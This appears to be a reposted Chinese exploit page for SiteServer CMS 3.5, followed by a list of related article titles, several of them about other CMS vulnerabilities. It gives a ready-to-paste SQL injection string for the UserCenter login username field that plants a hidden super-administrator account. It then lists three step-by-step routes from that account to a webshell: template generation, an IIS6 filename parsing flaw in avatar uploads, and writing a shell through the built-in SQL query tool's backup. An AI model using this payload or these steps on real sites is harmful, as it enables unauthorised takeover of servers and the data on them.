当前位置: 首页 > news >正文

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

经测试秒杀最新的3.5版
stieserver官网:www.siteserver.cn
 
EXP:
 
直接访问UserCenter/login.aspx
 
用户名处输入:
 
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
 
 
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。 之后再访问后台SiteServer/login.aspx用插入的用户登陆。
后台拿webshell的三种方法:
 
一、
 
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
 
二、
 
成员权限-》添加用户-》用户名为:1.asp
 
http://127.0.0.1/usercenter/ 
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
 
(ps:后台添加用户时不会验证是否含有非法字符)
 
三、
 
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
 
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
 

相关文章:

  • MSSQL数据库编码问题
  • 更换Firefox默认查看源代码工具的配色方案
  • Kesion cms注入漏洞
  • 轻松破解Win7的密码
  • 科讯 kesionCMS =8.0 9.0 任意下载漏洞最新 Exp
  • 通达OA 2011-2013 通杀GETSHELL
  • thinkphp框架下mysql注入
  • dedecms最新注入分析(可过gpc)
  • 过安全狗技术总汇
  • 建站之星最新0DAY
  • 最土团购网盲注n枚
  • MyBB plugin SQLi 0day
  • 使用HTTP_X_FORWARDED_FOR获取客户端IP的严重后果
  • ownCloud 开源云数据存储平台
  • PHPCMS v9 Getshell(Apache)
  • 《用数据讲故事》作者Cole N. Knaflic:消除一切无效的图表
  • Android 控件背景颜色处理
  • Bytom交易说明(账户管理模式)
  • docker-consul
  • ES6, React, Redux, Webpack写的一个爬 GitHub 的网页
  • java B2B2C 源码多租户电子商城系统-Kafka基本使用介绍
  • Otto开发初探——微服务依赖管理新利器
  • tweak 支持第三方库
  • Webpack4 学习笔记 - 01:webpack的安装和简单配置
  • Zepto.js源码学习之二
  • 利用jquery编写加法运算验证码
  • 微信小程序--------语音识别(前端自己也能玩)
  • 一起来学SpringBoot | 第三篇:SpringBoot日志配置
  • 移动互联网+智能运营体系搭建=你家有金矿啊!
  • 最简单的无缝轮播
  • 做一名精致的JavaScripter 01:JavaScript简介
  • No resource identifier found for attribute,RxJava之zip操作符
  • 400多位云计算专家和开发者,加入了同一个组织 ...
  • 宾利慕尚创始人典藏版国内首秀,2025年前实现全系车型电动化 | 2019上海车展 ...
  • 数据库巡检项
  • 通过调用文摘列表API获取文摘
  • ​软考-高级-信息系统项目管理师教程 第四版【第23章-组织通用管理-思维导图】​
  • ​云纳万物 · 数皆有言|2021 七牛云战略发布会启幕,邀您赴约
  • $().each和$.each的区别
  • $.ajax()参数及用法
  • (ros//EnvironmentVariables)ros环境变量
  • (二十五)admin-boot项目之集成消息队列Rabbitmq
  • (附源码)ssm码农论坛 毕业设计 231126
  • (四)模仿学习-完成后台管理页面查询
  • (完整代码)R语言中利用SVM-RFE机器学习算法筛选关键因子
  • (未解决)macOS matplotlib 中文是方框
  • (原創) 物件導向與老子思想 (OO)
  • (转载)(官方)UE4--图像编程----着色器开发
  • (轉貼)《OOD启思录》:61条面向对象设计的经验原则 (OO)
  • .htaccess 强制https 单独排除某个目录
  • .NET LINQ 通常分 Syntax Query 和Syntax Method
  • .NET 解决重复提交问题
  • .NET/C# 在代码中测量代码执行耗时的建议(比较系统性能计数器和系统时间)
  • .NET多线程执行函数
  • .net连接oracle数据库